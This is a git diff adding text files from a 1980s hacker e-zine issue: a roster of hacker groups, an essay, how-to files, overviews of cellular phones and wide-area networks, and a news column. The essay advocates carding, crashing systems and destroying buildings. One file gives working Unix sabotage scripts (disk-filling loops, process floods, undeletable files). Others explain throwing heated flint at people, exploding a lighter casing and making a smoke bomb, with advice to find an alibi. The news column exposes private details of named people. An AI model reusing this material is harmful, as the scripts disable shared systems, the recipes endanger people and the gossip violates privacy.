+                    Eagle Eyes                      Judge Dredd
+                    King Blotto                     Mr.  Modem
+                    Prince Squid                    Spectreman
+                    The Formatter
+-------------------------------------------------------------------------------
+2600 Club/New 2600 Club:  Both groups are no longer in existence.  Originally
+                          started as a local group of friends in St. Louis,
+                          Missouri, it gained members quickly, too quickly, and
+                          as the membership grew, the unity and productivity of
+                          the group lessened until the group(s) finally broke
+                          up.  However many of the members of 2600 Club now
+                          write (or have in the past) for Phrack Inc.  Among
+                          them are:
+
+     Cheap Shades/Data Line/Dr. Crash/Forest Ranger/Gin Fizz/Jester Sluggo
+   Knight Lightning/Monty Python/Phantom Phreaker/Taran King/The Clashmaster
+
+                  2600 Club had no relation to 2600 Magazine.
+-------------------------------------------------------------------------------
+Warelords:  There are 13 members in the Warelords and they are based in
+            California, Maryland, Tennessee, Washington D.C., and Wyoming.
+            Billibuster, a member of the group, said that the Warelords are a
+            phreaking and carding group that also writes programs and sells
+            them.  He claims that they are not pirates. The group isn't very
+            active.
+-------------------------------------------------------------------------------
+Other groups:
+------------
+Catholics Anonymous: A pirate group
+Elite Phreakers and Hackers Club:  From World of Cryton
+Feds R Us:  Joke by King Blotto
+High Mountain Hackers
+Imperial Warlords:  See Five-O
+Inner Circle:  The Cracker (Author of "Out of The Inner Circle")
+Kaos Inc.
+Knights of Shadow:  Sir Knight
+MPG:  Midwestern Pirates Guild
+NASA Elite:  Captain Kid
+Neon Knights:  See Metal Communications
+Phlash:  A relatively new Amiga kracking group.
+Phoneline Phantoms: The Colonel, The Duke, The Executioner, and The Sprinter.
+Phreak Hack Delinquents:  Metro Man and the Reaper (212)
+Project Genesis:  Sigmund Fraud
+RDTF:  Red Dawn Text-Files, Saltheart Foamfollower (SE) and Brain Gadget (Ca.)
+Shadow Brotherhood
+65C02 Elite (612):  Wizard of ARPAnet and The Count.  BBSes:  Irongate, North
+                    Pole, The Guild, and The Graveyard.
+The Dange Gang:  Maxwell's Demon
+Triple Entente
+2601 Club:  Formed by taRfruS to combat 2600 Club.
+1200 Club
+Ware Brigade
diff --git a/phrack6/3.txt b/phrack6/3.txt
new file mode 100644
index 0000000..1f92a76
--- /dev/null
+++ b/phrack6/3.txt
@@ -0,0 +1,84 @@
+                     Volume One, Issue Six, Phile 3 of 13
+
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+
+                             The Techno-Revolution
+
+                                      by
+
+                                 Doctor Crash
+
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+
+    Hacking. It is a full time hobby, taking countless hours per week to learn,
+experiment, and execute the art of penetrating multi-user computers.  Why do
+hackers spend a good portion of their time hacking?  Some might say it is
+scientific curiosity, others that it is for mental stimulation.  But the true
+roots of hacker motives run much deeper than that.  In this file I will
+describe the underlying motives of the aware hackers, make known the
+connections between Hacking, Phreaking, Carding, and Anarchy, and make known
+the "techno-revolution" which is laying seeds in the mind of every hacker.
+
+    To fully explain the true motives behind hacking, we must first take a
+quick look into the past.  In the 1960's, a group of MIT student built the
+first modern computer system.  This wild, rebellious group of young men were
+the first to bear the name "hackers".  The systems that they developed were
+intended to be used to solve world problems and to benefit all of mankind.
+
+    As we can see, this has not been the case.  The computer system has been
+solely in the hands of big businesses and the government.  The wonderful device
+meant to enrich life has become a weapon which dehumanizes people.  To the
+government and large businesses, people are no more than disk space, and the
+government doesn't use computers to arrange aid for the poor, but to control
+nuclear death weapons.  The average American can only have access to a small
+microcomputer which is worth only a fraction of what they pay for it.  The
+businesses keep the true state of the art equipment away from the people behind
+a steel wall of incredibly high prices and bureaucracy.  It is because of this
+state of affairs that hacking was born.
+
+    Hackers realize that the businesses aren't the only ones who are entitled
+to modern technology.  They tap into online systems and use them to their own
+advantage.  Of course, the government doesn't want the monopoly of technology
+broken, so they have outlawed hacking and arrest anyone who is caught.  Even
+worse than the government is the security departments of businesses and
+companies.  They act as their own "private armies" and their ruthless tactics
+are overlooked by the government, as it also serves their needs.
+
+    Hacking is a major facet of the fight against the computer monopoly.  One
+of the ways hackers accomplish their means has developed into an art in itself:
+Phone Phreaking.  It is essential that every Hacker also be a Phreak, because
+it is necessary to utilize the technology of the phone company to access
+computers far from where they live.  The phone company is another example of
+technology abused and kept from people with high prices.
+
+    Hackers often find that their existing equipment, due to the monopoly
+tactics of computer companies, is inefficient for their purposes.  Due to the
+inexorbitantly high prices, it is impossible to legally purchase the necessary
+equipment.  This need has given still another segment of the fight:  Credit
+Carding.  Carding is a way of obtaining the necessary goods without paying for
+them.  It is again due to the companies stupidity that Carding is so easy, and
+shows that the world's businesses are in the hands of those with considerably
+less technical know-how than we, the hackers.
+
+    There is one last method of this war against computer abusers.  This is a
+less subtle, less electronic method, but much more direct and gets the message
+across.  I am speaking of what is called Anarchy.  Anarchy as we know it does
+not refer to the true meaning of the word (no ruling body), but to the process
+of physically destroying buildings and governmental establishments.  This is a
+very drastic, yet vital part of this "techno-revolution."
+
+    Hacking must continue.  We must train newcomers to the art of hacking.  We
+must also increase computer Crashing.  I know that crashing a computer seems a
+waste, but when there is no other way to subvert a business, their system must
+be shut down.
+
+    As I stated above, this is only on the motives.  If you need a tutorial on
+how to perform any of the above stated methods, please read a file on it.  And
+whatever you do, continue the fight.  Whether you know it or not, if you are a
+hacker, you are a revolutionary.  Don't worry, you're on the right side.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+    If you have a question or comment about this file or the "techno-
+revolution" just leave mail for me on the Metal Shop AE (314)256-7284, or any
+other BBS I may happen to be on.
+
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
diff --git a/phrack6/4.txt b/phrack6/4.txt
new file mode 100644
index 0000000..146b44a
--- /dev/null
+++ b/phrack6/4.txt
@@ -0,0 +1,51 @@
+                     Volume One, Issue Six, Phile 4 of 13
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+              "How To Have Fun With a Bic <or generic> Lighter"
+
+                                by The Leftist
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+       First off, let me say, that I am not responsible for any personal
+       damage done by the use of the information in this file.
+
+Shower of sparks from nowhere:
+-----------------------------
+
+This trick is done usually with an empty lighter.  Disassemble the top, being
+careful not to loose the flint, and the spring, which are under the striker
+wheel.  Throw away everything else, unless there is still some fluid in the
+lighter, which can be used for some of the other things in this file.  Save the
+flint and spring.
+
+Ok, now take the spring, and pull on the end a little, and stretch the spring
+out a little longer than the flint.  Next, take the flint, and kind of wrap the
+end of the spring around it.  It should look sort of like fig. A.  Next, the
+fun part.  Take the spring, and hold it by the end that doesn't have flint on
+it, and heat the flint till it glows.  Don't worry, the heat won't burn your
+fingers.  Then, throw it flint first at victim, pavement, or whatever.
+
+         Fig. A
+                        \/\/\//\/\/\/\/\/\/\/\/\------
+                        /\/\/\/\/\/\/\/\/\/\/\/\------ <- heat this end
+                             ^                     ^
+                             |                     |
+                           spring                flint
+
+
+What to do with leftover lighter casing:
+---------------------------------------
+Light one of the striker wheel supports, and lay it upside down in a corner and
+run like hell!  This will blow pretty good.  You can also take the casing and
+wrap it loosely in a paper towel, light the towel, step back, and shoot it with
+a BB gun.  Fun.  Experiment, but don't ever puncture the lighter, while you're
+holding it, that would be foolish.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Any questions or comments?  Contact me on the 2400 Baud Exchange 404-925-9657.
+
+                                 The Leftist.
+                                      ^*^
+_______________________________________________________________________________
diff --git a/phrack6/5.txt b/phrack6/5.txt
new file mode 100644
index 0000000..96c8602
--- /dev/null
+++ b/phrack6/5.txt
@@ -0,0 +1,132 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue Six, Phile 5 of 13
+
+===============================================================================
+                                 ------------
+                                 Unix Nasties
+                                 ------------
+                               By Shooting Shark
+
+                           Written on April 3, 1986
+===============================================================================
+
+Summary:  Methods of sabotaging your favorite Unix system.
+
+Preface:  I do not advocate utilizing ANY of the methods I put forth in this
+          file.  Unix is a cool operating system, perhaps one of the best
+          systems ever designed in many respects.  If you have access to a Unix
+          system, you should LEARN UNIX AND LEARN C, because that is where the
+          money is in the computer world.  However, Unix is a relatively
+          insecure operating system which is easy to fuck up. This file
+          explains a few ways of doing so.
+
+Crash The System
+----------------
+Unix has no built-in provision for the maximum amount of disk space allowed per
+user.  Thus, one user can grab all the disk space on the system and effectively
+prevent anyone else from writing to the disk.  A simple way of grabbing all the
+disk space is to create subdirectory after subdirectory until it is no longer
+possible.  Here are a few ways of doing it.
+
+1>  Create a file with the following lines:
+
+mkdir subdir
+cd subdir
+source /u1/mydir/crash
+
+    Call it crash.  The last line ("source /u1/mydir/crash") should be altered
+    so that it will look for the file in your directory.  If your directory is
+    /u3/students/jeff, the last line should say "source
+    /u3/students/jeff/crash". After you write the above file, type:
+
+% source crash
+
+    and wait...within a few minutes the program will abort because it won't
+    have any more room on the disk.  Neither will anyone else.
+
+2>  Here's a more elegant way of doing the same thing.  Create this "endless
+    loop" shellscript:
+
+while : ; do
+mkdir subdir
+cd subdir
+done
+
+    and then "source" the file.  If you are in the "sh" shell (if you are, you
+    will probably have a "$" prompt) you can type "while : ; do" from the $
+    prompt.  You will then get a > prompt.  Type the next three lines and sit
+    back.
+
+3>  If you'd like to set the process in motion and hang up, and the file is
+    called crash, type:
+
+% nohup source crash &
+
+    and log off.  This will start it as a background process, allowing you to
+    log off.  However, log off QUICKLY, since if you used the first example for
+    your crash file, it will also eat up background processes like crazy which
+    will also fuck up the system to some extent.  Which brings us to...
+
+Slow Down The System Immensely
+------------------------------
+There are many ways of doing this, the method being creating a sufficiently
+large number of background processes.   Here's one specific example.  Create a
+file called "slow1" with the following lines:
+
+w &
+source slow1
+
+create a file called "slow2" with:
+
+source slow1 &
+source slow2
+
+and execute slow2 with
+
+% slow2
+or
+% slow2 &
+
+This will create 25 background processes, each one running 25 background
+processes.  The system will hardly move after you've got each one running.
+
+Messing Up A Directory
+----------------------
+Many file-handling commands use "-" options.  Create a file with a "-" at the
+beginning of its name by doing this:
+
+cat > -filename
+
+[now type a few lines, maybe something rude like "ha ha you can't delete this
+file".]  Type a ^D (control-d) to end input.  You now have a file called
+-filename in your directory.  It will be VERY difficult to remove this file.
+If you were to try rm (remove) -filename or mv (rename) -filename, the rm or mv
+program would interpret -filename as an option, not a file, and would give you
+an error message telling you that -filename was not a valid option...thus, the
+file stays there obnoxiously.
+
+Create a couple of hundred files with "-" as the first characters in their
+names...it will be a royal pain for the person who is blessed with these new
+files, and they will probably just have to get a new login.
+
+Conclusion
+
+The use of any of these techniques is quite irresponsible, and if anyone did
+this to my Unix system, I'd be quite pissed.  That is why I strongly recommend
+that you never use these tricks.
+
+So Long,
+Shooting Shark
+
+"Some people have a bad attitude, and I say, if they want to act tough, beat
+'em up!" -  Blue Oyster Cult
+-------------------------------------------------------------------------------
+For more information on UNIX sabotage and cracking, see the following articles:
+
+Ritchie, Dennis M. [he wrote Unix] "On the Security of UNIX."  Programmers
+Manual for UNIX System III Volume II.  Supplementary Documents.
+
+Filipski, Alan and Hanko, James.  "Making UNIX Secure."  BYTE Magazine, April
+1986, pp 113-128.
+===============================================================================
diff --git a/phrack6/6.txt b/phrack6/6.txt
new file mode 100644
index 0000000..7824e80
--- /dev/null
+++ b/phrack6/6.txt
@@ -0,0 +1,58 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue Six, Phile 6 of 13
+-------------------------------------------------------------------------------
+                                        *
+                                       /
+                                 /=-=-=-=-=-\
+                                < Smoke Bomb >
+                                 >----------<
+                                <     by     >
+                                 >  Alpine  <
+                                <    Kracker >
+                                 \-=-=-=-=-=/
+-------------------------------------------------------------------------------
+
+Ingredients-
+    Saltpetre (Potassium Nitrate)
+    Sugar
+    Alcohol (100% is best, but plain rubbing alcohol will work)
+    Gunpowder (or some ground-up rocket engines)
+    Matches (Get a box of 50 packs -they can be very useful.)
+    Coffee can
+    Cigarette
+
+Instructions:
+------------
+Combine the sugar and saltpetre in a 3:1 ratio (Sugar:saltpetre) and heat
+over a low flame until the mixture has thoroughly melted together. (It will
+look like sticky white lumps when ready) You need to stir this continually
+while heating, and remove it from the flame at the very first sign of smoke. I
+had a batch go off in my face once, and the workroom was filled with smoke for
+a good half hour. It is easier and safer to work with smaller batches.
+
+Now, dump all of this "smoke powder" into a coffee can, add some match heads,
+moisten it with a little alcohol, and add gunpowder until all the smoke powder
+is coated. Now tape a cigarette between the match heads in an unopened book.
+Imbed the book into the mixture.
+
+Light the but, and walk casually away to find a nice alibi within 5 minutes.
+
+Notes:
+-----
+You should be able to find some Saltpeter in a local drug store.
+
+All of the gunpowder, match heads, and alcohol is simply to insure good
+ignition. You can omit them, but if you have them, mix them in for
+reliability's sake. For the fuse, you can either use the one listed, or either
+some canon fuse, or a rocket igniter and an electrical system.
+
+A quarter pound of this stuff is supposed to fill a city block. I'm not sure if
+that is accurate, but it sure fills a public bathroom nicely.
+
+    /\          |   /
+   /  \         |  /
+  /====\        | /
+  |    |        | \
+  |    lpine    |  racker
+_______________________________________________________________________________
diff --git a/phrack6/7.txt b/phrack6/7.txt
new file mode 100644
index 0000000..3181279
--- /dev/null
+++ b/phrack6/7.txt
@@ -0,0 +1,102 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue Six, Phile 7 of 13
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+                              Cellular Telephones
+                      [Written By The High Evolutionary]
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+    I assume that most of us know many of the technical aspects of Cellular
+Phreaking therefore this file is intended for general information as to how
+these unique devices operate.
+
+        --------------------------------------------------------------
+
+    Cellular is likely to be successful because it provides dramatic
+improvements over the historic automobile phones.  For years, mobile
+radio-telephone service was an extremely limited proposition.  There were only
+forty-four radio channels available, and a maximum of about thirty were
+assigned to any one area.  That meant if all thirty channels were occupied-one
+conversation per channel-and you were the thirty-first mobile phone user who
+wished to make a call, you would have to wait thirty minutes or more, even in a
+city the size of New York.  As you can imagine, mobile radio-telephone service
+like that could not become very popular.  Even with the limited number of
+channels, long delays in making calls during busy periods, and often poor
+quality transmission, there were big waiting lists for mobile service.  But
+with a fully equipped cellular radio-telephone system, it is possible to make
+5000 times as many calls simultaneously in the same metropolitan area, opening
+up the service to anyone that can pay the hefty prices.
+
+    That is because cellular radio-telephones systems are technically quite
+different from traditional mobile telephones.  First, the FCC (Federal
+Communications Commission) has allocated far more channels to cellular, 666 in
+all.  Second, those 666 channels are broadcast from many different locations.
+In the old mobile telephone systems, there was one powerful radio station with
+a large antenna that served an entire city.  In the new system, a geographical
+area is honeycombed with many cells, hence the name 'Cellular'.  Each cell has
+its own low-powered radio transmitter and receiver. As a car with a cellular
+telephone or a person carrying a portable moves from one cell to the next, the
+call is transferred automatically.  You're unlikely to notice when this
+transfer takes place, even though your phone is suddenly switched to a
+different radio station and to another channel while you are talking.
+
+    Because the cellular signal is low-powered, it doesn't go very far.  This
+permits the same channel you are talking on to be used for calls in other parts
+of the same metropolitan area without interference.  This would mean cellular
+radio-telephone systems can serve a very large number of customers in an area
+because there are more channels than before-and the larger number of channels
+are reused.
+
+    Unlike local telephone service, which is provided by a monopoly, there is
+competition in cellular.  Two classes of companies are allowed to offer
+cellular telephone service in every market.  One cellular system can be owned
+by a telephone company, the other by someone else.  The two-company rule was
+adopted by the FCC so that AT&T, which developed cellular, could not monopolize
+the whole thing.
+
+    Cellular Telephones come in two basic versions, as car phones and portable
+phones, with a briefcase hybrid.  Car phones are by far the most common,
+because they are much cheaper.  But most believe that, ultimately, portables
+will be the most popular.  Washington Post Company president Richard Simmons,
+whose company is a partner in several cellular systems, even predicts that by
+the early 1990's "There will be phones roughly the size of a calculators that
+you carry around in your pocket.  They will cost no more than five hundred
+dollars.  They will emancipate people from the necessity of locating a phone to
+make calls. The bad news is, you will never be able to get away from the phone,
+and we'll call it progress."
+
+    Car telephones include a small transmitter-receiver unit that is usually
+mounted in the trunk, an antenna and a control head that includes the handset.
+In most cellular systems, the telephone touchpad is located on the handset.
+Many domestic and foreign manufacturers make cellular car phones, but so far
+only Motorola makes portables, the DYNA T-A-C 8000X and 8000S. Motorola's
+portables look like a slightly enlarged, somewhat chunky telephone handset,
+with a stubby antenna at one end.
+
+    Portables are less powerful than car units, so they can't be used with some
+cellular systems.  The portable's other limitation is battery life.  A portable
+can listen for calls for about eight hours, but it can only transmit for only
+thirty minutes.  After that time it must be charged for a minimum of an hour.
+
+    The following American cities have cellular telephone service or soon will
+get it:
+
+                         New York         Denver
+                         Los Angeles      Seattle
+                         Chicago          Milwaukee
+                         Philadelphia     Tampa
+                         Detroit          Cincinnati
+                         Boston           Kansas City
+                         San Francisco    Buffalo
+                         Washington       Phoenix
+                         Dallas           San Jose
+                         Houston          Indianapolis
+                         St. Louis        New Orleans
+                         Miami            Portland
+                         Pittsburgh       Cleveland
+                         San Diego        Atlanta
+                         Baltimore        Minneapolis
+        --------------------------------------------------------------
diff --git a/phrack6/8.txt b/phrack6/8.txt
new file mode 100644
index 0000000..22d924a
--- /dev/null
+++ b/phrack6/8.txt
@@ -0,0 +1,171 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue Six, Phile 8 of 13
+
+!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!
+
+                            Jester Sluggo presents
+                                 an insight on
+                              Wide-Area Networks
+                                    Part 2
+
+!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!
+
+Part 1 contains information on ARPANET and CSNET.
+Part 2 contains information on BITNET, MFENET, UUCP and USENET.
+It is best if you read both files to better understand each other.
+-------------------------------------------------------------------------------
+     These files will cover general information on wide-area networks, (I.E.
+ARPANET, CSNET, BITNET, MFENET, UUCP and USENET), but may contain information
+in relationship with other networks not emphasized in these files.  These files
+are NOT a hacker's tutorial/guide on these systems.
+
+                                    BITNET
+                                    ~~~~~~
+BITNET.  In 1981, City University of New York (CUNY) surveyed universities on
+the East Coast of the U.S. and Canada, inquiring whether there was interest in
+creating and easy-to-use, economical network for interuniversity communication
+between scholars.  The response was positive.  Many shared the CUNY belief in
+the importance of computer-assisted communication between scholars.  The first
+link of the new network, called BITNET, was established between CUNY and Yale
+University in May 1981.
+     The network technology chosen for BITNET was determined by the
+availability of the RSCS software on the IBM computers at the initial sites.
+[The name BITNET stands for Because It's Time NETwork.]  The RSCS software is
+simple but effective, and most IBM VM-CMS computer systems have it installed
+for local communications, supporting file transfer and remote job entry
+services.  The standard BITNET links are leased telephone lines running at 9600
+bps.  Although all the initial nodes were IBM machines in university computer
+centers, the network is in no way restricted to such systems.  Any computer
+with an RSCS emulator can be connected to BITNET.  Emulators are available for
+DEC VAX-VMS systems, VAX-UNIX systems, and for Control Data Corp. Cyber systems
+and others.  Today, more than one-third of the computers on BITNET are non-IBM
+systems.
+     BITNET is a store-and-forward network with files and messages sent from
+computer to computer across the network.  It provides electronic mail, remote
+job entry, and file transfer services, and supports and interactive message
+facility and a limited remote logon facility.  Most BITNET sites use the same
+electronic mail procedures and standards as the ARPANET, and as a result of the
+installation of electronic mail gateway systems at the University of California
+at Berkley and at the University of Wisconsin-Madison, most BITNET users can
+communicate electronically with users on CSNET and the ARPANET.
+     BITNET has expanded extremely rapidly -- a clear indication that is
+providing service that people need and want.  The simplicity of the connection
+to the network -- acquiring a 9600-bps leased line to the nearest neighboring
+computer node and in installing an additional line interface and modem --
+provides the service at the right price.  By the end of 1985 the number of
+computers connected was expected to exceed 600, at more than 175 institutions
+of higher education throughout the U.S.  BITNET is open without restriction to
+any college or university.  It is not limited to specific academic disciplines,
+and may be used for any academic purpose.  However, use for commercial purposes
+is prohibited.  In special cases, connection of commercial organizations may be
+sponsored by universities.  A particular case is the connection of Boeing
+Computer Services to BITNET, as part of the NSFnet initiative, to provide
+remote job entry services to their Cray X-MP/24 to NSF supercomputer grantees
+who have access to BITNET.
+     Until recently BITNET had no central management structure, and was
+coordinated by an executive board consisting of members from the major
+institutions participating.  This worked because most of the computers
+connected were managed and operated by professional service organizations in
+university computer centers.  However, the growth in the network made it
+possible to continue in this ad hoc fashion, and a central support organization
+was established with support from an IBM grant.  The central support
+organization, called the BITNET network support center (BITNSC), has two parts:
+A user services organization, the network information center (BITNSC), which
+provides user support, a name server and a variety of databases, and the
+development and operations center (BITDOC) to develop and operate the network.
+A major question facing the members of BITNET is how the funding of this
+central organization will be continued when the IBM grant expires in 1987.
+     BITNET, with support from the NSFnet Program, is now examining ways to
+provide ARPANET-like services to existing BITNET sites.  The project, which is
+similar to the CSNET CYPRESS project, will explore a strategy to provide an
+optional path to the use of the TCP-IP procedures on existing 9.6-kbps leased
+lines.  The possibility of upgrading these lines to multiple alternate links,
+providing higher reliability and availability, or to higher speed 56-kbps links
+is also being studied.  The project will offer a higher level of service to
+BITNET sites choosing this path and also enable a low-cost connection to
+NSFnet.
+
+                                    MFENET
+                                    ~~~~~~
+MFENET.  The DOE's magnetic fusion energy research network was established in
+the mid-1970's to support access to the MFE Cray 1 supercomputer at the
+Lawrence Livermore National Laboratory.  The network uses 56-kbs satellite
+links, and is designed to provide terminal access to the Cray time-sharing
+system (CTSS), also developed at the Lawrence Livermore Laboratory.  The
+network currently supports access to Cray 1, Cray X-MP/2, Cray 2, and Cyber 205
+supercomputers.  The network uses special-purpose networking software developed
+at Livermore, and, in addition to terminal access, provides file transfer,
+remote output queuing, and electronic mail, and includes some specialized
+application procedures supporting interactive graphics terminals and local
+personal computer (PC)-based editing.  Access to the network is in general
+restricted to DOE-funded researchers.  Recently the network has been expanded
+to include the DOE-funded supercomputer at Florida State University. MFENET is
+funded by DOE and managed by Livermore.
+     MFENET has been successful in supporting DOE supercomputer users. However,
+the specialized nature of the communications protocols is now creating
+difficulties for researchers who need advanced graphics workstations that use
+the UNIX BSD 4.2 operating system and the TCP-IP protocols on LAN's. For these
+and other reasons, DOE is examining how best to migrate MFENET to the TCP-IP,
+and later to the OSI, protocols.
+     The combination of the CTSS operating system and the MFENET protocols
+creates an effective interactive computing environment for researchers using
+Cray supercomputers.  For this reason, two of the new NSF national
+supercomputer centers -- San Diego (SDSC) and Illinois -- have chosen the CTSS
+operating system.  In SDSC's case, the MFENET protocols have also been chosen
+to support the SDSC Consortium network.  In Illinois case, a project to
+implement the TCP-IP protocols for the CTSS operating system has been funded by
+the NSFnet program, and these developments will be shared with SDSC (and with
+DOE) to provide a migration path for the SDSC Consortium network.
+
+                                UUCP and USENET
+                                ~~~~     ~~~~~~
+UUCP and USENET.  The UUCP network was started in the 1970's to provide
+electronic mail and file transfer between UNIX systems.  The network is a
+host-based store-and-forward network using dialup telephone circuits and
+operates by having each member site dialup the next UUCP host computer and send
+and receive files and electronic mail messages.  The network uses addresses
+based on the physical path established by this sequence of dialups connections.
+UUCP is open to any UNIX system which chooses to participate.  There are
+"informal" electronic mail gateways between UUCP and ARPANET, BITNET, or CSNET,
+so that users of any of these networks can exchange electronic mail.
+     USENET is a UNIX news facility based on the UUCP network that provides a
+news bulletin board service.  Neither UUCP nor USENET has a central management;
+volunteers maintain and distribute the routing tables for the network.  Each
+member site pays its own costs and agrees to carry traffic. Despite this
+reliance on mutual cooperation and anarchic management style, the network
+operates and provides a useful, if somewhat unreliable, and low-cost service to
+its members.  Over the years the network has grown into a world-wide network
+with thousands of computers participating.
+
+                                    OTHERS
+                                    ~~~~~~
+Other Wide-Area Networks.  Of necessity this file of wide-area networks has
+been incomplete: Other networks of interest include the Space Plasma Analysis
+Network (SPAN) -- a network of DEC VAX computers using 9.6-kbps links and the
+DECNET protocols for National Aeronautics and Space Administration's
+researchers; the planned Numerical and Atmospheric Sciences (NAS) network
+centered at Ames Research Center -- a network that is expected to use existing
+and planned NASA communications links and the TCP-IP protocols; and the planned
+high-energy physics network -- a network based largely on VAX computers and
+using the standard X.25 network level protocols plus the so called "coloured
+books" protocols developed in the United Kingdom.  Also, many high-energy
+physicists, at the Stanford Linear Accelerator, at the Lawrence Berkley
+Laboratory, and at Fermi Laboratory, among others, have used DECNET to connect
+their DEC VAX computers together.
+
+/
+\
+/ luggo !!
+
+Please give full credit for references to the following:
+
+Dennis M. Jennings, Lawrence H. Landweber, Ira H. Fuchs, David J. Faber, and W.
+Richards Adrion.
+
+Any questions, comments or Sluggestions can be emailed to me at Metal Shop, or
+sent via snailmail to the following address until 12-31-1986:
+
+                                   J. Sluggo
+                                  P.O. Box 93
+                          East Grand Forks, MN  56721
diff --git a/phrack6/9.txt b/phrack6/9.txt
new file mode 100644
index 0000000..0e86e09
--- /dev/null
+++ b/phrack6/9.txt
@@ -0,0 +1,299 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue Six, Phile 9 of 13
+
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
+
+                         *-=+^ Phrack World News ^+=-*
+
+                               Issue Five/Part 1
+
+                            Compiled and Written By
+
+                               Knight Lightning
+
+~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
+
+Where is Taran King?                                               May 10, 1986
+--------------------
+Taran King is generally thought to be a very mellow, easy going person.  For
+the most part this is true.  However he also gets into major fights with his
+dad. When Taran does get pissed he, gets violent.  In the past he has punched a
+hole into his bedroom door and put dents in his refrigerator with his fists.
+
+Most recently his dad found out about his collection of illegal knives,
+including stilettos, butterflies, and survival knives.  They got into an
+argument about this and eventually into a fight.  Taran stormed off to his
+room.  Meanwhile, unknown to him, his dad called the police.  They took him to
+a nearby hospital's adolescent psychiatric ward, supposedly for evaluation.  As
+of June 14, 1986 he has been there for five weeks and the end isn't in sight.
+
+For a while he had no phone of visitor privileges and there was no way of
+contacting him.  This now has changed, but the problems have not been solved.
+
+On May 23, 1986 he was let out on a pass to go see Judas Priest in concert (it
+was great).  He has been let out on pass several times since then as well,
+mostly on weekends.
+
+As far as Metal Shop Private...
+
+Well on May 12, 1986, the /\/impha and I decided to go to Taran's house to
+collect the Phrack files and to add a few new modifications to the bbs so that
+I could control it better remotely.  Taran's sister let us in, no problem.
+Unfortunately, before we were done Taran's dad came home.  He immediately
+spotted my car outside and burst into the house.  He was pissed that we were
+there and made sure we weren't stealing anything (like I am really going to
+steal from my best friend right?).  He assumed that the bbs had crashed and
+that we were there fixing it.  He then decided that he didn't want us to come
+over every time the board crashed and TOOK IT DOWN!
+
+Metal Shop Private will return when Taran gets out, hopefully sometime in June.
+_______________________________________________________________________________
+
+Metal Shop AE                                                    April 27, 1986
+-------------
+Metal Shop AE is now the proud possessor of a full 40 megs of online storage.
+It also has added an individual password system for greater board security and
+now has an email messaging service online.
+
+Metal Shop AE is sysoped by Cheap Shades.  It is one of the main distribution
+centers for Phrack Inc.  It has the complete Phrack series online as well as
+almost 1000 other files.
+
+To become a member of Metal Shop AE, contact Cheap Shades, Taran King, or
+Knight Lightning.
+
+To upload files for distribution in Phrack Inc. be sure to upload them to drive
+E which will save your file to a non-public viewable drive where it will stay
+until it is edited for Phrack.
+_______________________________________________________________________________
+
+Mark Tabas and Karl Marx Busted                                     May 2, 1986
+-------------------------------
+The story goes like this; Mark Tabas was working at a plant in Denver where
+credit card blanks are manufactured.  He decided to take a few.  He and Karl
+Marx then went about finding someone with an embossing machine to print some
+stuff onto the blanks.  They were able to find someone and agreed to meet at a
+motel to do the work.  Everything went well.  They were able to print card
+numbers, names, and expiration dates that they had gotten onto the blanks.  To
+celebrate they ordered a bottle of champagne from room service, and paid for it
+with one of the cards.  At that point the guy with the embosser pulled his
+badge, Secret Service!  Now Mark Tabas and Karl Marx are facing forgery and
+carding charges along with theft for the blanks.
+
+               Information provided by Sally Ride...Space Cadet
+
+(Editor's Note:  At the time that this information was gained, Sally Ride
+ commented that it may be a rumor.  Any inconsistencies are not his fault)
+-------------------------------------------------------------------------------
+                                                                   May 15, 1986
+
+We at Phrack have since uncovered more information about this bust.  Apparently
+a guy named Will Bell, who's handle was Jack Bell, set up Karl Marx and Mark
+Tabas.  Will Bell had the embossing machine and was not a member of the Secret
+Service.  Instead, he was the son of a member of the Secret Service (although
+maybe he was the son of a member of the FBI).  Since he was not a fed, this was
+not a case of entrapment.  It is believed that Will/Jack Bell is originally
+from the 312 (Chicago) area.
+
+            Information Provided by Jester Sluggo and The Sprinter
+_______________________________________________________________________________
+
+FBI/Wylon In Action
+-------------------
+On May 2, 1986, the homes of Cheap Shades and Kleptic Wizard received visits
+from Edward P. Nowicki, Special Agent of the Federal Bureau of Investigation.
+
+This was not a bust in any way.  This agent was trying to gain evidence for a
+telecommunications company known as Wylon, which is mainly based in the
+Colorado/Wyoming area.  Apparently someone or several people had been calling
+Kleptic Palace AE and Metal Shop AE illegally and Mr. Nowicki wanted to know
+who had been placing these calls.
+
